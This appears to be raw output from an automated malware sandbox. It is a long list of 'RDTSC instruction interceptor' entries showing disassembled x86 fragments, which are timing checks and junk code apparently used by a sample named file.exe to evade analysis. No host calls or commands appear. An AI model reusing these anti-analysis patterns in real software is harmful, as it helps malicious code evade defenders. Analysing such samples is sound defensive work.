                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 486030E second address: 486032F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, dx 0x00000011 movsx ebx, si 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 486032F second address: 486034C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov edx, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 486034C second address: 4860350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48805D8 second address: 48805ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ECCCADF1h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48805ED second address: 48805FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop esi 0x0000000e mov bl, 5Bh 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48805FE second address: 488060C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ECCCADEAh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488060C second address: 4880682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov si, bx 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 jmp 00007FD7ED12076Bh 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 pushfd 0x00000019 jmp 00007FD7ED12076Bh 0x0000001e or eax, 05952F7Eh 0x00000024 jmp 00007FD7ED120779h 0x00000029 popfd 0x0000002a pop esi 0x0000002b pushad 0x0000002c mov edx, 05BFA192h 0x00000031 mov edx, 4EB244DEh 0x00000036 popad 0x00000037 popad 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e jmp 00007FD7ED120777h 0x00000043 popad 0x00000044 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880682 second address: 4880688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880688 second address: 488068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488068C second address: 488069B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488069B second address: 48806B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120774h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48806B3 second address: 48806C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ECCCADEEh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48806C5 second address: 4880702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [76FB65FCh] 0x0000000d jmp 00007FD7ED120777h 0x00000012 test eax, eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD7ED120775h 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880702 second address: 4880765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, D0C2h 0x00000007 call 00007FD7ECCCADF3h 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FD85F37E02Ch 0x00000016 pushad 0x00000017 mov ch, dl 0x00000019 mov eax, 31B021EDh 0x0000001e popad 0x0000001f mov ecx, eax 0x00000021 jmp 00007FD7ECCCADF8h 0x00000026 xor eax, dword ptr [ebp+08h] 0x00000029 jmp 00007FD7ECCCADF1h 0x0000002e and ecx, 1Fh 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880765 second address: 4880769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880769 second address: 4880788 instructions: 0x00000000 rdtsc 0x00000002 mov si, DBDFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 272156FBh 0x0000000d popad 0x0000000e ror eax, cl 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD7ECCCADEDh 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880788 second address: 48807B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007FD7ED12076Eh 0x0000000f retn 0004h 0x00000012 nop 0x00000013 mov esi, eax 0x00000015 lea eax, dword ptr [ebp-08h] 0x00000018 xor esi, dword ptr [000B2014h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 call 00007FD7F1930E55h 0x0000002a push FFFFFFFEh 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48807B7 second address: 48807BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48807BD second address: 4880812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120774h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FD7ED120770h 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007FD7F1930E86h 0x00000017 mov edi, edi 0x00000019 pushad 0x0000001a push esi 0x0000001b mov cl, bl 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007FD7ED120775h 0x00000026 jmp 00007FD7ED12076Bh 0x0000002b popfd 0x0000002c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880812 second address: 4880873 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FD7ECCCADF2h 0x0000000d push eax 0x0000000e jmp 00007FD7ECCCADEBh 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FD7ECCCADF6h 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov bx, 2370h 0x00000022 call 00007FD7ECCCADF9h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880873 second address: 4880879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880879 second address: 488087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488087D second address: 48808A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120778h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48808A1 second address: 48808A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483003F second address: 4830043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830043 second address: 483005A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483005A second address: 48300B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD7ED12076Fh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FD7ED120779h 0x0000000f sbb ah, 00000076h 0x00000012 jmp 00007FD7ED120771h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD7ED120773h 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48300B7 second address: 48300BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48300BB second address: 48300C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48300C1 second address: 4830109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD7ECCCADF2h 0x00000009 sub eax, 3EF32DF8h 0x0000000f jmp 00007FD7ECCCADEBh 0x00000014 popfd 0x00000015 call 00007FD7ECCCADF8h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830109 second address: 483015A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD7ED120778h 0x00000008 adc ax, 92B8h 0x0000000d jmp 00007FD7ED12076Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 mov ebx, ecx 0x00000018 mov ebx, eax 0x0000001a popad 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD7ED120776h 0x00000027 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483015A second address: 4830160 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830160 second address: 483018C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007FD7ED120770h 0x00000011 xchg eax, ecx 0x00000012 pushad 0x00000013 mov bx, cx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483018C second address: 48301D0 instructions: 0x00000000 rdtsc 0x00000002 mov cx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FD7ECCCADF0h 0x0000000e xchg eax, ecx 0x0000000f jmp 00007FD7ECCCADF0h 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FD7ECCCADF7h 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48301D0 second address: 48301D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48301D6 second address: 48301DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48301DA second address: 48301F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD7ED12076Dh 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48301F2 second address: 48301F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48301F8 second address: 4830215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD7ED120772h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830215 second address: 4830250 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD7ECCCADF1h 0x00000008 pop ecx 0x00000009 jmp 00007FD7ECCCADF1h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebx, dword ptr [ebp+10h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD7ECCCADEDh 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830250 second address: 4830256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830256 second address: 483025A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483025A second address: 4830291 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120773h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FD7ED120776h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830291 second address: 4830297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830297 second address: 483031D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FD7ED120776h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 jmp 00007FD7ED120770h 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 movzx eax, bx 0x0000001c mov bx, 3F9Eh 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FD7ED120771h 0x0000002b or cx, 1726h 0x00000030 jmp 00007FD7ED120771h 0x00000035 popfd 0x00000036 call 00007FD7ED120770h 0x0000003b pop ecx 0x0000003c popad 0x0000003d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483031D second address: 4830358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 call 00007FD7ECCCADF3h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov ecx, ebx 0x00000013 jmp 00007FD7ECCCADF1h 0x00000018 popad 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830358 second address: 483035C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483035C second address: 4830362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830362 second address: 48303EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD7ED120770h 0x00000008 pop esi 0x00000009 mov di, 89F6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FD85F81E9FEh 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD7ED120773h 0x0000001d jmp 00007FD7ED120773h 0x00000022 popfd 0x00000023 mov bl, ch 0x00000025 popad 0x00000026 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002d jmp 00007FD7ED12076Bh 0x00000032 je 00007FD85F81E9D0h 0x00000038 jmp 00007FD7ED120776h 0x0000003d mov edx, dword ptr [esi+44h] 0x00000040 pushad 0x00000041 mov esi, 16F942FDh 0x00000046 push eax 0x00000047 push edx 0x00000048 movzx ecx, dx 0x0000004b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48303EB second address: 483046F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD7ECCCADF5h 0x00000008 sbb ecx, 293D48C6h 0x0000000e jmp 00007FD7ECCCADF1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 or edx, dword ptr [ebp+0Ch] 0x0000001a jmp 00007FD7ECCCADEEh 0x0000001f test edx, 61000000h 0x00000025 pushad 0x00000026 mov al, B4h 0x00000028 pushad 0x00000029 movsx edx, si 0x0000002c push esi 0x0000002d pop ebx 0x0000002e popad 0x0000002f popad 0x00000030 jne 00007FD85F3C902Eh 0x00000036 jmp 00007FD7ECCCADECh 0x0000003b test byte ptr [esi+48h], 00000001h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FD7ECCCADF7h 0x00000046 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483046F second address: 4830487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ED120774h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830487 second address: 48304D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FD85F3C8FEFh 0x00000011 jmp 00007FD7ECCCADF6h 0x00000016 test bl, 00000007h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD7ECCCADF7h 0x00000020 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48207F9 second address: 4820839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD7ED120771h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 jmp 00007FD7ED12076Ch 0x00000016 mov ebx, esi 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820839 second address: 482083D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482083D second address: 4820856 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120775h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820856 second address: 48208B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f pushad 0x00000010 mov dl, F0h 0x00000012 mov bx, cx 0x00000015 popad 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 jmp 00007FD7ECCCADF0h 0x0000001d push eax 0x0000001e jmp 00007FD7ECCCADEBh 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 mov ax, 3CBBh 0x00000029 mov eax, 5BE3E997h 0x0000002e popad 0x0000002f xchg eax, esi 0x00000030 jmp 00007FD7ECCCADEAh 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FD7ECCCADEEh 0x0000003d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48208B2 second address: 48208D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD7ED120775h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48208D9 second address: 4820923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FD7ECCCADEEh 0x00000011 sub ebx, ebx 0x00000013 jmp 00007FD7ECCCADF1h 0x00000018 test esi, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD7ECCCADEDh 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820923 second address: 4820929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820929 second address: 482092D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482092D second address: 4820977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD85F8261BFh 0x0000000e pushad 0x0000000f mov dx, 3E88h 0x00000013 movsx ebx, ax 0x00000016 popad 0x00000017 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FD7ED120776h 0x00000025 and al, FFFFFFE8h 0x00000028 jmp 00007FD7ED12076Bh 0x0000002d popfd 0x0000002e push eax 0x0000002f push edx 0x00000030 movzx esi, bx 0x00000033 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820977 second address: 4820A21 instructions: 0x00000000 rdtsc 0x00000002 mov cx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ecx, esi 0x0000000a jmp 00007FD7ECCCADEDh 0x0000000f je 00007FD85F3D07FBh 0x00000015 jmp 00007FD7ECCCADEEh 0x0000001a test byte ptr [76FB6968h], 00000002h 0x00000021 jmp 00007FD7ECCCADF0h 0x00000026 jne 00007FD85F3D07E3h 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FD7ECCCADEEh 0x00000033 or esi, 76F298D8h 0x00000039 jmp 00007FD7ECCCADEBh 0x0000003e popfd 0x0000003f popad 0x00000040 mov edx, dword ptr [ebp+0Ch] 0x00000043 pushad 0x00000044 mov ebx, 53B111C6h 0x00000049 mov di, 8452h 0x0000004d popad 0x0000004e push eax 0x0000004f jmp 00007FD7ECCCADF6h 0x00000054 mov dword ptr [esp], ebx 0x00000057 jmp 00007FD7ECCCADF0h 0x0000005c xchg eax, ebx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 push eax 0x00000061 pop ebx 0x00000062 popad 0x00000063 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820A21 second address: 4820A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ED120770h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820A35 second address: 4820A56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FD7ECCCADF3h 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820A56 second address: 4820A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820A5C second address: 4820A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820A60 second address: 4820A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007FD7ED120773h 0x0000000e push dword ptr [ebp+14h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD7ED120770h 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820A93 second address: 4820AA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820B21 second address: 4820B8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120770h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007FD7ED120770h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 mov al, 2Bh 0x00000013 call 00007FD7ED120773h 0x00000018 call 00007FD7ED120778h 0x0000001d pop esi 0x0000001e pop ebx 0x0000001f popad 0x00000020 mov esp, ebp 0x00000022 jmp 00007FD7ED12076Eh 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820B8F second address: 4820B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820B93 second address: 4820BB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
